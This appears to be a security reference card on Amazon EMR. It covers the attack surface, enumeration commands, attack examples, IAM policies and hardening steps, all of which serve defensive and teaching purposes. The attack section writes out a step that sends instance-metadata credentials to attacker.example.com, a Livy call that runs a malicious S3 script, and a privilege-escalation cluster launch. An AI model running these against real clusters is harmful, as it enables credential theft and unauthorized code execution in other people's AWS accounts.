Amazon EMR (Elastic MapReduce) runs Apache Spark, Hadoop, Hive, Presto, and other big data frameworks on EC2 clusters. IMDS credential theft, exposed web interfaces, and over-privileged instance profiles are the primary attack surface.
EMR cluster nodes are EC2 instances with an instance profile (default: EMR_EC2_DefaultRole) that grants S3 access through EMRFS. Each node exposes the EC2 Instance Metadata Service at 169.254.169.254. IMDSv1 is vulnerable to SSRF-based credential theft.
Attack note: Any code running on an EMR cluster node can query IMDS to obtain the EC2 instance profile credentials, which typically include broad S3 access.
EMR clusters host over a dozen web interfaces: YARN ResourceManager (8088), Spark History Server (18080), Livy REST API (8998), Hue (8888), JupyterHub (9443), Zeppelin (8890), Ganglia (80), Tez UI (8080), HBase (16010), Flink History Server (8082), HDFS NameNode (9870).
Attack note: Livy (port 8998) accepts unauthenticated REST API calls to execute arbitrary code on the cluster if exposed to the network.
EMR clusters run arbitrary code by design, combine multiple EC2 instances with shared credentials, expose numerous unauthenticated web interfaces, and often have instance profiles with broad S3 access. Without encryption enabled via security configurations, data at rest and in transit is unprotected by default.
aws emr list-clusters --activeaws emr describe-cluster --cluster-id j-XXXXXXXXXXXXXaws emr list-security-configurationsaws emr describe-security-configuration \
--name my-security-configaws emr list-steps --cluster-id j-XXXXXXXXXXXXXaws emr describe-cluster --cluster-id j-XXXXXXXXXXXXX \
--query 'Cluster.BootstrapActions'aws emr list-instances --cluster-id j-XXXXXXXXXXXXXaws emr get-block-public-access-configurationaws emr get-cluster-session-credentials \
--cluster-id j-XXXXXXXXXXXXX \
--execution-role-arn arn:aws:iam::123456789012:role/MyExecRoleKey insight: EMR clusters execute arbitrary code by design. The real privilege escalation risk is the gap between "can submit code to the cluster" and "the permissions the cluster's instance profile grants in AWS."
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns role name, then:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>aws emr add-steps --cluster-id j-XXXXXXXXXXXXX \
--steps Type=CUSTOM_JAR,Name=Exfil,Jar=command-runner.jar,Args=[bash,-c,"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/creds && curl -X POST -d @/tmp/creds https://attacker.example.com/collect"]curl -X POST -H "Content-Type: application/json" \
http://<emr-primary-node>:8998/batches \
-d '{"file": "s3://attacker-bucket/malicious.py"}'aws emr create-cluster --name "escalation" \
--release-label emr-6.15.0 \
--instance-type m5.xlarge --instance-count 1 \
--ec2-attributes InstanceProfile=HighPrivilegeRole \
--service-role EMR_DefaultRole \
--steps Type=CUSTOM_JAR,Name="cmd",Jar="command-runner.jar",Args=["aws","s3","ls"]{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"elasticmapreduce:AddJobFlowSteps",
"elasticmapreduce:RunJobFlow"
],
"Resource": "*"
}]
}Allows injecting arbitrary code steps into any EMR cluster or launching new clusters
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"elasticmapreduce:DescribeCluster",
"elasticmapreduce:ListSteps",
"elasticmapreduce:ListInstances"
],
"Resource": "arn:aws:elasticmapreduce:eu-west-1:123456789012:cluster/*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/Environment": "production"
}
}
}]
}Read-only access scoped to tagged clusters in a specific region
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "s3:*",
"Resource": "*"
}]
}Any code on the cluster can read/write/delete any S3 object in the account
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::my-data-lake-bucket",
"arn:aws:s3:::my-data-lake-bucket/approved-prefix/*"
]
}]
}Instance profile limited to read-only access on specific S3 prefixes
Require IMDSv2 session tokens to block SSRF-based credential theft from cluster applications. Use an EC2 launch template with MetadataOptions: {HttpTokens: required, HttpPutResponseHopLimit: 1}.
Create a security configuration that enables encryption for S3 data (SSE-KMS), local disk (LUKS), and in-transit (TLS).
aws emr create-security-configuration \
--name "encryption-config" \
--security-configuration '{
"EncryptionConfiguration": {
"EnableInTransitEncryption": true,
"EnableAtRestEncryption": true
}
}'Verify BPA is enabled (default). Prevents launching clusters with security groups that allow public inbound traffic on any port except SSH (22).
aws emr get-block-public-access-configurationPlace EMR clusters in private subnets with no public IP addresses. Use SSH tunnels, VPN, or an ALB with authentication for web UI access.
Configure Kerberos for user-level authentication so individual users are authenticated before accessing cluster services.
aws emr create-cluster --name "kerberized-cluster" \
--release-label emr-6.15.0 \
--kerberos-attributes Realm=EXAMPLE.COM,KdcAdminPassword=<password>Configure EMRFS IAM role mappings so different users or groups assume different roles when accessing S3 through EMRFS.
Deploy Apache Knox as a perimeter gateway to authenticate and proxy web interface traffic instead of directly exposing YARN, Spark UI, Livy, and other endpoints.
Replace the default EMR_EC2_DefaultRole with a custom role that grants access only to the specific S3 buckets and prefixes the cluster needs.
Amazon EMR Security Card • Toc Consulting
Always obtain proper authorization before testing